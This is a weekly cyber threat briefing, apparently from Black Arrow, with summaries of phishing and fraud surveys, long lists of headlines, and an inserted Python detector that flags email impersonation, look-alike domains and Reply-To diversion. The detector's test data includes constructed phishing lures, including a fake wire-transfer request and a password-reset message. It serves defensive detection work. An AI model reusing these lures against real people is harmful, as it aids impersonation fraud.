Research indicates that 72% of US senior executives have been targeted by cyber attacks in the past 18 months, highlighting the C-suite as a key security vulnerability. Attacks have grown in frequency and sophistication, with impersonation scams up by 26%, and 27% involving AI-assisted deepfakes. Despite this, many organisations have not prioritised executive security training, even though 87% of IT professionals believe senior executives require more training than other staff. Given these findings, executive-focused training and protections should be prioritised alongside wider security controls.
Email Phishing Attacks Surge as Attackers Bypass Security Controls
Egress has reported a 28% rise in email phishing attacks in Q2 2024 compared to Q1, highlighting how effectively attackers bypass security controls. Notably, 44% of attacks originated from compromised internal accounts and 8% from compromised supply chain accounts; mail from a genuine account passes sender-authentication checks, so controls that rely on them do not stop it. The report found that 89% of phishing emails involved impersonation, often targeting HR, IT and finance departments. Additionally, commodity attacks have surged, causing a 2,700% increase in phishing volumes during such campaigns. Emerging trends also show attackers using multi-channel approaches, moving the lure onto platforms such as Microsoft Teams and WhatsApp that sit outside email security controls.
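The impersonation figure above (and the executive impersonation in the previous story) is the part of this picture that header checks can still catch: a trusted display name arriving from the wrong address, a look-alike sender domain, or a Reply-To that quietly redirects the conversation. The Python below is an added example for this briefing, not code from Egress or Black Arrow; the organisation domain, the roster of frequently impersonated senders and the three messages are all constructed, and the look-alike test is deliberately crude.

```python
"""Flag inbound mail that borrows a known sender's display name from an
unexpected address, uses a look-alike domain, or diverts replies elsewhere.

Added example, not from Egress' report. OUR_DOMAIN, KNOWN_SENDERS and the
messages in SAMPLES are constructed.
"""
from email import message_from_string
from email.utils import parseaddr

OUR_DOMAIN = "example.com"  # assumption: the organisation's own mail domain

# Constructed roster: display names attackers are likely to borrow, mapped to
# the only address each should legitimately come from. Keys are lower case.
KNOWN_SENDERS = {
    "jane doe": "jane.doe@example.com",
    "it service desk": "helpdesk@example.com",
}

# Constructed sample messages (headers, blank line, body).
SAMPLES = {
    "external_lookalike": """From: Jane Doe <jane.doe@examp1e.com>
To: finance@example.com
Subject: Urgent wire transfer

Please process the attached invoice today.
""",
    "reply_to_hijack": """From: IT Service Desk <helpdesk@example.com>
Reply-To: helpdesk-support@mail-recovery.net
To: staff@example.com
Subject: Password expiry

Reset your password using the link below.
""",
    "legitimate": """From: Jane Doe <jane.doe@example.com>
To: finance@example.com
Subject: Q3 numbers

Attached.
""",
}


def _domain(addr):
    """Lower-cased domain part of an address, or '' if there is none."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _lookalike(domain, target):
    """Crude look-alike test: same length with at most two differing characters
    (examp1e.com vs example.com), or the target's label embedded in a longer
    domain (example-secure.net)."""
    if domain == target:
        return False
    if len(domain) == len(target) and sum(a != b for a, b in zip(domain, target)) <= 2:
        return True
    return target.split(".")[0] in domain


def impersonation_findings(raw_message):
    """Return a list of human-readable findings for one RFC 5322 message."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    display_key = display.strip().lower()
    sender_domain = _domain(addr)
    findings = []

    # A roster name arriving from any address other than its known one.
    if display_key in KNOWN_SENDERS and addr.lower() != KNOWN_SENDERS[display_key]:
        findings.append(f"display name '{display}' used from unexpected address {addr}")

    # An external domain that visually resembles ours.
    if sender_domain != OUR_DOMAIN and _lookalike(sender_domain, OUR_DOMAIN):
        findings.append(f"look-alike sender domain {sender_domain}")

    # Replies steered to a domain other than the one the mail claims to be from.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != sender_domain:
        findings.append(f"Reply-To {reply_addr} diverts replies away from {sender_domain}")
    return findings


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, "->", impersonation_findings(raw) or "no findings")
```

The first sample trips both the roster and the look-alike checks; the second passes the roster check (the address is genuine) and is caught only by the Reply-To divergence, which is also the pattern to expect when the 44% of attacks sent from compromised internal accounts try to pull the conversation off the monitored mailbox. A message sent from a compromised account with no Reply-To trick produces no findings at all here: that class needs account-behaviour signals (new inbox rules, unusual sending volume, impossible-travel sign-ins) rather than header inspection.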
Security Threats Are More Pressing Than Ever for Business Leaders, With Cloud Worries Taking Top Spot
PwC has found that cloud-related threats are now the top concern for executives, with 42% ranking them as their primary worry. Despite this focus, 34% admit they are least prepared to address these issues. Hack-and-leak operations and third-party breaches are also significant concerns, cited by 38% and 35% of respondents respectively. Interestingly, Chief Information Security Officers place ransomware among their top three worries, with 42% feeling underprepared to tackle it. The expanding attack surface from increased reliance on cloud, AI, and connected devices underscores the need for an agile, enterprise-wide approach to resilience.
Ten Million Brits Hit by Fraud in Just Three Years
A recent study sponsored by Santander UK and conducted by the Social Market Foundation (SMF) revealed that 21% of respondents across 15 European countries experienced fraud between 2021 and 2023, at a direct cost of £168bn. However, the SMF estimated the total cost of such incidents at £420bn; this includes productivity losses from having to spend time reporting and recovering from the fraud incident. In the UK alone, victims lost an average of £907 each, amounting to a total direct cost of around £9bn. The report highlights that while most believe banks should lead in compensating victims, many also see digital platforms and telecom providers as responsible. Both SMF and Santander are calling on the British government to spearhead a global initiative to combat fraud, including international agreements and enhanced law enforcement.
Is the Weakest Link in Cyber Security Becoming Even Weaker?
Human error is the leading cause of cyber security breaches, with Cybint reporting that 95% result from human mistakes. Verizon's 2023 Data Breach Investigations Report highlights that 74% of incidents involve a human element, such as clicking on phishing links. The rise of deepfakes and increased exposure of personal information have intensified these risks, making attacks more sophisticated. Despite awareness training, prominent organisations continue to face breaches. Notably, Gen Z is over three times more likely to fall for online fraud compared to baby boomers. Remote working has further blurred boundaries, increasing vulnerability to cyber attacks.
Cyber Incidents are the Achilles Heel for Major UK CEOs, Report Finds
FGS Global has found that cyber attacks are the top concern for UK businesses, with 36% of senior leaders reporting cyber incidents in the past year. Despite 85% of firms experiencing a crisis, only 36% feel highly prepared to handle ransomware attacks, which over half fear facing. The report highlights a lack of understanding around cyber security and cyber crime, intensified by AI risks.
Sources:
https://votiro.com/blog/how-snoozing-on-cybersecurity-fails-modern-businesses/
https://www.helpnetsecurity.com/2024/10/04/cloud-environments-attack-surface/
https://dcnnmagazine.com/security/90-of-cybersecurity-incidents-could-be-avoided-survey-reveals/
https://www.computerweekly.com/opinion/The-cyber-industry-needs-to-accept-it-cant-eliminate-risk
https://www.computerweekly.com/news/366612212/Cyber-teams-say-they-cant-keep-up-with-attack-volumes
https://www.techradar.com/pro/c-level-executives-are-a-weak-point-for-cybersecurity-research-says
https://www.infosecurity-magazine.com/news/email-phishing-surge-bypass/
https://www.infosecurity-magazine.com/news/ten-million-brits-hit-fraud-three/
https://hackernoon.com/is-the-weakest-link-in-cybersecurity-becoming-even-weaker
https://www.cityam.com/cyber-incidents-are-the-achilles-heel-for-major-uk-ceos-report-finds/
Governance, Risk and Compliance
CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)
Allies to Leverage During a Cyber Crisis (darkreading.com)
The cyber industry needs to accept it can't eliminate risk | Computer Weekly
Cyber incidents are the Achilles Heel for major UK CEOs, report finds (cityam.com)
As CISO roles expand, so should cyber budgets, says NASCIO 2024 cyber security report | StateScoop
Human Capital and Risk Governance: Insider Threats To Cyber Security (forbes.com)
Global cyber threat to double predicts new report (emergingrisks.co.uk)
Over Half of Cyber Professionals Feel Their Budget is Underfunded - IT Security Guru
C-level executives are a weak point for cyber security | TechRadar
Average North American CISO salary now $565,000 • The Register
BlackBerry report: Cyber threats up 53%, critical sectors hit (securitybrief.co.nz)
Cyber teams say they can’t keep up with attack volumes | Computer Weekly
Watch out, CFOs: cyber crime is booming, says former White House advisor | Fortune
Normalizing Security Culture: Stay Ready (darkreading.com)
Cyber attacks causing reputational damages: CIRA – BNN Bloomberg
Security spending signals major role change for CISOs and their teams | CSO Online
Strengthening Security Posture Through People-First Engagement (informationsecuritybuzz.com)
Forrester's CISO Budget Planning Guide for 2025: Prioritize API Security - Security Boulevard
Gartner: CISOs should ditch ‘zero tolerance’ prevention (techinformed.com)
How to Enlist the CFO as a Cyber Security Budget Ally | Mimecast
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware gangs are using stolen data to threaten CEOs | Fortune
Embargo ransomware escalates attacks to cloud environments (bleepingcomputer.com)
Microsoft: Cloud Environments of US Organisations Targeted in Ransomware Attacks - SecurityWeek
Multinational police effort hits sections of Lockbit ransomware operation | CyberScoop
Russia’s FSB protected Evil Corp gang that carried out NATO cyber-attacks (yahoo.com)
US charges Joker's Stash and Rescator money launderers (bleepingcomputer.com)
More frequent disruption operations needed to dent ransomware gangs, officials say | CyberScoop
Ransomware activity shows no signs of slowing down - Help Net Security
International Counter Ransomware Initiative 2024 Joint Statement | The White House
Ransomware crew infects 100+ orgs monthly with BabyLockerKZ • The Register
Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)
Healthcare organisations are having to pay millions to solve ransomware attacks | TechRadar
Here's what to expect from the Counter Ransomware Initiative meeting this week (therecord.media)
JPCERT shares Windows Event Log tips to detect ransomware attacks (bleepingcomputer.com)
Some of the world's biggest countries are teaming up to tackle ransomware scams | TechRadar
Ransomware August 2024 round-up: fools, rules and tools | TechFinitive
Ransomware Victims
Patelco Credit Union Data Breach Impacts Over 1 Million People - SecurityWeek
Ransomware forces Texas hospital to turn away ambulances • The Register
Agence France-Presse says cyber attack targeted IT systems (therecord.media)
Dermatology Practice Sued After Ransomware Attack Exposed Data (bloomberglaw.com)
Phishing & Email Based Attacks
UK on high alert over Iranian spear-phishing attacks, says NCSC | Computer Weekly
New report reveals a rise in phishing attacks, as commodity (globenewswire.com)
Beyond Phishing: AI's New Tricks for Cyber Attacks (govinfosecurity.com)
UK issues alert over threat from cyber attackers working for Iranian state | Evening Standard
iPhone, Android Users Warned After 50,000 Message Email Bomb Attack (forbes.com)
Common Words in Email Scams: Money, Income, Investment, More | Entrepreneur
QR Code phishing is advancing to a new level, so be on your guard | TechRadar
Attackers Targeting Recruiters With More_Eggs Backdoor (darkreading.com)
“Gone Phishing”—Every Cyber Attacker’s Favorite Phrase - Gigaom
IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert
INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)
Ireland is the most phished country in the world, says survey (siliconrepublic.com)
Business Email Compromise (BEC)/Email Account Compromise (EAC)
IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert
Other Social Engineering
QR Code phishing is advancing to a new level, so be on your guard | TechRadar
Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors
INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)
Physical Security Is a Big Part of Staying Digitally Safe: My 5 Top Tips (makeuseof.com)
Meet the people hacker trying to improve cyber security (siliconrepublic.com)
Artificial Intelligence
AI-related cyber crime sparks concern among 65% of global survey participants (techmonitor.ai)
New report reveals a rise in phishing attacks, as commodity (globenewswire.com)
Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon
Three essential steps for organisations to safeguard against deepfakes | TechRadar
Beyond Phishing: AI's New Tricks for Cyber Attacks (govinfosecurity.com)
Putting an end to the AI cyber responsibility turf wars | CyberScoop
Shadow AI, Data Exposure Plague Workplace Chatbot Use (darkreading.com)
FIN7 Gang Hides Malware in AI “Deepnude” Sites - Infosecurity Magazine (infosecurity-magazine.com)
Ukraine-Russia Cyber Battles Have Real-World Impact (darkreading.com)
Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)
Could APIs be the undoing of AI? - Help Net Security
AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)
1 in 4 people have experienced identity fraud - and most of them blame AI | ZDNET
Rogue AI: What the Security Community is Missing | Trend Micro (US)
Spotting AI-generated scams: Red flags to watch for - Help Net Security
Cyber security experts praise veto of California's AI safety bill | SC Media (scworld.com)
2FA/MFA
The most common authentication method is also the least secure - Help Net Security
Session Hijacking 2.0 — The Latest Way That Attackers are Bypassing MFA (thehackernews.com)
Malware
FIN7 Gang Hides Malware in AI “Deepnude” Sites - Infosecurity Magazine (infosecurity-magazine.com)
New Fin7 Hacker’s AI Naked Image Generator Serves Up More Than Nudes (forbes.com)
DCRat Malware Spreads via HTML Smuggling | MSSP Alert
Attackers Targeting Recruiters With More_Eggs Backdoor (darkreading.com)
Thousands of Linux systems infected by stealthy malware since 2021 (arstechnica.com)
Microsoft reveals how Windows 10 and Windows 11 block keyloggers - Neowin
AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)
Here's How Criminals Use CAPTCHAs to Help Spread Malware (makeuseof.com)
North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks (thehackernews.com)
Bots/Botnets
New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet (thehackernews.com)
What bots mean for businesses and consumers - Help Net Security
Mobile
iPhone, Android Users Warned After 50,000 Message Email Bomb Attack (forbes.com)
This nasty Android adware is making phones unusable — how to stay safe | Tom's Guide (tomsguide.com)
‘Pig butchering’ trading apps found on Google Play, App Store (bleepingcomputer.com)
Verizon outage: iPhones, Android devices stuck in SOS mode (bleepingcomputer.com)
Denial of Service/DoS/DDoS
Record-Breaking DDoS Attack Peaked at 3.8 Tbps, 2.14 Billion Pps - SecurityWeek
After Code Execution, Researchers Show How CUPS Can Be Abused for DDoS Attacks - SecurityWeek
Hacktivist activity drives a rise in DDoS attacks (betanews.com)
Telcos face increasing frequency and sophistication of DDoS attacks - Nokia (telecoms.com)
Cloudflare mitigated new record-breaking DDoS attack of 3.8 Tbps (securityaffairs.com)
Wave of record-breaking DDoS attacks originating from compromised WiFi routers | Cybernews
Internet of Things – IoT
Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)
Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors
Data Breaches/Leaks
Transport for London (TfL) cyber attack: What you need to know - BBC News
43% of data breaches target small businesses in 5 industries | Retail Technology Review
UK data watchdog confirms it's investigating MoneyGram data breach | TechCrunch
Patelco Credit Union Data Breach Impacts Over 1 Million People - SecurityWeek
T-Mobile US agrees to $31.5M settlement after IT breaches • The Register
Dutch police breached by a state actor (securityaffairs.com)
Louisiana Accounting Firm Breach Impacts More Than 127K Customers | MSSP Alert
Organised Crime & Criminal Actors
UK man allegedly used genealogy sites to hack execs’ email accounts | Fortune
Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)
How the FBI and Mandiant caught a 'serial hacker' who tried to fake his own death | TechCrunch
UK reveals father and son at heart of Evil Corp hacking group - BBC News
Man charged for selling forged license keys for network switches (bleepingcomputer.com)
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Linux malware “perfctl” behind years-long cryptomining campaign (bleepingcomputer.com)
Over $750 Million Stolen in Crypto Last Quarter Despite Drop in Hacks: CertiK - Decrypt
New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet (thehackernews.com)
AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)
Insider Risk and Insider Threats
Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon
Insider Threats: Are Disgruntled Employees a Cyber Security Risk? | PLANSPONSOR
Insurance
A Guide to Buying and Maintaining Cyberinsurance | PLANSPONSOR
Beazley forecasts cyber insurance market to grow to $40bn by 2030 - Reinsurance News
Munich Re’s HSB launches comprehensive cyber insurance solution for SMBs - Reinsurance News
Supply Chain and Third Parties
Cyber companies need a best practice approach to major incidents. | Computer Weekly
Digital twins are optimizing supply chains and more. Here's why enterprises should care | ZDNET
Cloud/SaaS
Embargo ransomware escalates attacks to cloud environments (bleepingcomputer.com)
Microsoft: Cloud Environments of US Organisations Targeted in Ransomware Attacks - SecurityWeek
Cloud threats top execs' list of cyber nightmares • The Register
Cyber criminals capitalize on poorly configured cloud environments - Help Net Security
The top enterprise cloud threats of 2024 (betanews.com)
Hackers Breach Hybrid Cloud with Stolen Entra ID Credentials (petri.com)
IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert
Hacker made millions from breaking into business Office 365 accounts | TechRadar
Navigating the Security Risks of Multicloud Management (darkreading.com)
Top 6 Cloud Security Threats to Watch Out For - Security Boulevard
The End of The SaaS Era: Rethinking Software’s Role In Business
Outages
Cyber companies need a best practice approach to major incidents. | Computer Weekly
UK Post Office axes MoneyGram services in wake of cyber attack (finextra.com)
Verizon outage: iPhones, Android devices stuck in SOS mode (bleepingcomputer.com)
The Playstation Network is down in a global outage (bleepingcomputer.com)
Identity and Access Management
Five Eyes Agencies Release Guidance on Detecting Active Directory Intrusions - SecurityWeek
Active Directory attack guidance issued by Five Eyes | SC Media (scworld.com)
Encryption
The fix for BGP’s weaknesses – RPKI – has issues of its own • The Register
Linux and Open Source
Worried about that critical RCE Linux bug? Here's why you can relax | ZDNET
After Code Execution, Researchers Show How CUPS Can Be Abused for DDoS Attacks - SecurityWeek
Thousands of Linux systems infected by stealthy malware since 2021 (arstechnica.com)
Passwords, Credential Stuffing & Brute Force Attacks
The most common authentication method is also the least secure - Help Net Security
Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)
IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert
Passkeys and Cyber Security Awareness: A New Era Of Business Security (informationsecuritybuzz.com)
Poor password habits still an issue worldwide (betanews.com)
Complicated Passwords Make You Less Safe, Experts Now Say (forbes.com)
Why your password policy should include a custom dictionary (bleepingcomputer.com)
Social Media
Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)
Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors
UK regulator preparing for ‘strong action’ against tech giants
Are social media influencers equipped to dodge cyber attacks? | Mint (livemint.com)
Brits bemoan personal data practices but do little about it • The Register
Training, Education and Awareness
Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon
One-Third of UK Teachers Do Not Have Cyber Security Training (techrepublic.com)
Regulations, Fines and Legislation
NIS2 could prevent cyber security incidents but many businesses aren't ready (betanews.com)
Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)
SolarWinds CISO: World's Cyber Regulations Still 'In Flux' (pymnts.com)
Sellafield nuclear site in Cumbria fined for IT security breaches - BBC News
Government outlines plan for Cyber Security and Resilience Bill | UKAuthority
How Should CISOs Navigate the SEC Cyber Security Rules? (darkreading.com)
Ireland to grant National Cyber Security Centre emergency powers (finextra.com)
Opinion: How to design a US data privacy law | Ars Technica
UK data watchdog confirms it's investigating MoneyGram data breach | TechCrunch
T-Mobile US agrees to $31.5M settlement after IT breaches • The Register
Opinion | Artificial Intelligence Requires Specific Safety Rules - The New York Times (nytimes.com)
Minimum Healthcare Cyber Standards Called by New Legislation | MSSP Alert
UK regulator preparing for ‘strong action’ against tech giants
Cyber Security in the European Union | Cooley LLP - JDSupra
Financial regulatory agencies are sunsetting a tool to assess cyber risks | FedScoop
Cyber security experts praise veto of California's AI safety bill | SC Media (scworld.com)
Models, Frameworks and Standards
NIS2 could prevent cyber security incidents but many businesses aren't ready (betanews.com)
Could Security Misconfigurations Top OWASP List? (darkreading.com)
Government outlines plan for Cyber Security and Resilience Bill | UKAuthority
Data Protection
Opinion: How to design a US data privacy law | Ars Technica
Brits bemoan personal data practices but do little about it • The Register
Careers, Working in Cyber and Information Security
Average North American CISO salary now $565,000 • The Register
Cyber UK's quickest growing tech field, but skills gap remains | Computer Weekly
Cyber security Professionals Operate Under Increased Stress Levels - Security Boulevard
How Are We Going to Fill 4.8 Million Cyber Security Jobs? (inforisktoday.com)
Cyber security hiring slows, pros' stress levels rise - Help Net Security
Share of Women in UK Cyber Roles Now Just 17% - Infosecurity Magazine (infosecurity-magazine.com)
Law Enforcement Action and Take Downs
Russia exploited Evil Corp relationship for NATO attacks • The Register
Unmasked: The Evil Corp cyber gangster who worked for LockBit | Computer Weekly
More LockBit Hackers Arrested, Unmasked as Law Enforcement Seizes Servers - SecurityWeek
Iranian hackers charged over Trump campaign disruption | TechRadar
U.S. charges Joker's Stash and Rescator money launderers (bleepingcomputer.com)
Law enforcement arrests vacationing LockBit developer in ongoing operation | TechSpot
Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)
How the FBI and Mandiant caught a 'serial hacker' who tried to fake his own death | TechCrunch
UK reveals father and son at heart of Evil Corp hacking group - BBC News
INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)
Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)
More frequent disruption operations needed to dent ransomware gangs, officials say | CyberScoop
Telegram revealed it shared U.S. user data with law enforcement (securityaffairs.com)
Man charged for selling forged license keys for network switches (bleepingcomputer.com)
Misinformation, Disinformation and Propaganda
Intel agencies warn of Iran's ongoing phishy behavior • The Register
Iranian hackers charged over Trump campaign disruption | TechRadar
Microsoft cracks down further on Russian hackers looking to disrupt elections | TechRadar
Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)
Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)
Protecting Democratic Institutions from Cyber Threats - Microsoft On the Issues
Cyber Warfare and Cyber Espionage
Nation State Actors
China
Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)
China-Linked CeranaKeeper Targeting Southeast Asia with Data Exfiltration (thehackernews.com)
Russia
Russia exploited Evil Corp relationship for NATO attacks • The Register
Multinational police effort hits sections of Lockbit ransomware operation | CyberScoop
Police arrest four suspects linked to LockBit ransomware gang (bleepingcomputer.com)
More LockBit Hackers Arrested, Unmasked as Law Enforcement Seizes Servers - SecurityWeek
Russia’s FSB protected Evil Corp gang that carried out Nato cyber-attacks (yahoo.com)
Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)
Ukraine-Russia Cyber Battles Have Real-World Impact (darkreading.com)
Microsoft and DOJ disrupt Russian FSB hackers' attack infrastructure (bleepingcomputer.com)
Microsoft cracks down further on Russian hackers looking to disrupt elections | TechRadar
Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)
bne IntelliNews - Russian tech startups, cyber security firms flourish amid sanctions
Russian authorities arrest nearly 100 in raids tied to cyber criminal money laundering | CyberScoop
Dutch police breached by a state actor (securityaffairs.com)
Law enforcement arrests vacationing LockBit developer in ongoing operation | TechSpot
Iran
UK on high alert over Iranian spear-phishing attacks, says NCSC | Computer Weekly
Intel agencies warn of Iran's ongoing phishy behaviour • The Register
Iranian hackers charged over Trump campaign disruption | TechRadar
Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)
North Korea
North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks (thehackernews.com)
North Korea Profits as 'Stonefly' APT Swarms US Co's. (darkreading.com)
North Korean hackers attack Diehl Defence company - Militarnyi
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Hacktivist activity drives a rise in DDoS attacks (betanews.com)
ICE Signs $2 Million Contract With Spyware Maker Paragon Solutions | WIRED
Tools and Controls
Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon
CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)
Cyber companies need a best practice approach to major incidents. | Computer Weekly
Allies to Leverage During a Cyber Crisis (darkreading.com)
The cyber industry needs to accept it can't eliminate risk | Computer Weekly
As CISO roles expand, so should cyber budgets, says NASCIO 2024 cyber security report | StateScoop
Over Half of Cyber Professionals Feel Their Budget is Underfunded - IT Security Guru
Five Eyes Agencies Release Guidance on Detecting Active Directory Intrusions - SecurityWeek
How to Plan and Prepare for Penetration Testing (thehackernews.com)
Session Hijacking 2.0 — The Latest Way That Attackers are Bypassing MFA (thehackernews.com)
Moving DevOps Security Out of 'the Stone Age' (darkreading.com)
Security spending signals major role change for CISOs and their teams | CSO Online
Three hard truths hindering cloud-native detection and response - Help Net Security
Forrester's CISO Budget Planning Guide for 2025: Prioritize API Security - Security Boulevard
Gartner: CISOs should ditch ‘zero tolerance’ prevention (techinformed.com)
API security maturity model to assess API security posture | TechTarget
Top 6 Cloud Security Threats to Watch Out For - Security Boulevard
JPCERT shares Windows Event Log tips to detect ransomware attacks (bleepingcomputer.com)
The Silent Epidemic: Uncovering the Dangers of Alert Fatigue and How to Overcome It (cybereason.com)
Top 5 Myths of AI & Cyber Security (darkreading.com)
How organisations can derive value from security investments and enable business growth | ITPro
How to balance your understanding of threats and how you respond to them | ITPro
Does your security strategy show continuous improvement? | ITPro
The convergence of network and security – how it helps achieve business outcomes | ITPro
Other News
The cyber industry needs to accept it can't eliminate risk | Computer Weekly
Cyber incidents are the Achilles Heel for major UK CEOs, report finds (cityam.com)
Global cyber threat to double predicts new report (emergingrisks.co.uk)
Cyber teams say they can’t keep up with attack volumes | Computer Weekly
How Snoozing on Cyber Security Fails Modern Businesses - Security Boulevard
UK man allegedly used genealogy sites to hack execs’ email accounts | Fortune
UK Post Office axes MoneyGram services in wake of cyber attack (finextra.com)
Feds say Microsoft security ‘requires an overhaul’ — but will it listen? – Computerworld
Global cyber attacks will more than double this year to 211, says QBE - Reinsurance News
Critical Infrastructure: The latest target for cyber criminals? | TechRadar
When Innovation Outpaces Financial Services Cyber Security - Security Boulevard
Securing Space in the Age of Advanced Cyber Threats (eetimes.eu)
Schools reminded to maintain cyber hygiene by Ofqual | Education Business (educationbusinessuk.net)
America's policy in cyber space is about persistence, not deterrence (cyberscoop.com)
One-Third of UK Teachers Do Not Have Cyber Security Training (techrepublic.com)
Global Cyber Security Agencies Release OT Security Guidelines (inforisktoday.com)
Vulnerability Management
Could Security Misconfigurations Top OWASP List? (darkreading.com)
What are zero-day vulnerabilities? | TechRadar
NVD still backlogged with 17K+ unprocessed bugs • The Register
Systems used by courts and governments across the US riddled with vulnerabilities | Ars Technica
Vulnerabilities
Thousands of Adobe Commerce e-stores hacked by exploiting CosmicSting bug (securityaffairs.com)
Worried about that critical RCE Linux bug? Here's why you can relax | ZDNET
Ivanti Endpoint Manager Flaw Actively Targeted, CISA Warns Agencies to Patch (thehackernews.com)
Progress Software Releases Patches for 6 Flaws in WhatsUp Gold – Patch Now (thehackernews.com)
New Chrome Security Warning For 3 Billion Windows, Mac, Linux, Android Users (forbes.com)
Rackspace systems hit by zero-day exploit of third-party app • The Register
Organisations Warned of Exploited SAP, Gpac and D-Link Vulnerabilities - SecurityWeek
Zimbra RCE Vuln Under Attack Needs Immediate Patching (darkreading.com)
700K+ DrayTek routers are sitting ducks on the internet • The Register
Critical flaw in NVIDIA Container Toolkit allows full host takeover (bleepingcomputer.com)
Microsoft fixes Windows KB5043145 reboot loops, USB and Bluetooth issues (bleepingcomputer.com)
VLC Player Vulnerability Let Attackers Execute Malicious Code (cybersecuritynews.com)
Arc browser adds security bulletins and bug bounties - The Verge
The fix for BGP’s weaknesses – RPKI – has issues of its own • The Register
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 27 September 2024
Black Arrow Cyber Threat Intelligence Briefing 27 September 2024:
-Cyber Threats Top the 2024 Travelers Risk Index, Fourth Time in Six Years
-Preparing for the Cyber Security and Fraud Risks of Deepfakes: What Executive Teams Need to Know
-Organisation Data on Dark Web Increases Cyber Attack Risk: Marsh McLennan
-84 Percent of Enterprises Suffered Security Incidents in the Last Year
-It's Estimated That 91% of Cyber Attacks Begin with Phishing Emails
-82% of Phishing Sites Now Target Mobile Devices
-UK Firms Are Dangerously Overconfident About Paying Ransoms to Cyber Criminals
-Preparing To Fail is a Vital Part of Cyber Security
-Over a Third of Employees Secretly Sharing Work Info with AI
-Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks
-Underfunding and Leadership Gaps Weaken Cyber Security Defences
-Racist Network Rail Wi-Fi Hack was Work of Malicious Insider
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber related news from the last week.
Top Cyber Stories of the Last Week
Cyber Threats Top the 2024 Travelers Risk Index, Fourth Time in Six Years
The 2024 Travelers Risk Index shows cyber threats as the top concern for 62% of businesses, surpassing medical cost inflation, employee benefits costs, and economic uncertainty (all at 59%). Despite increased awareness, 30% of over 1,200 respondents lack cyber insurance, though coverage rose to 65% from 60% last year. Cyber incidents rose for the eighth time in nine years, with 24% experiencing breaches. Key concerns include security breaches (57%), ransomware (54%), unsafe employee practices (53%), and system glitches (53%).
Preparing for the Cyber Security and Fraud Risks of Deepfakes: What Executive Teams Need to Know
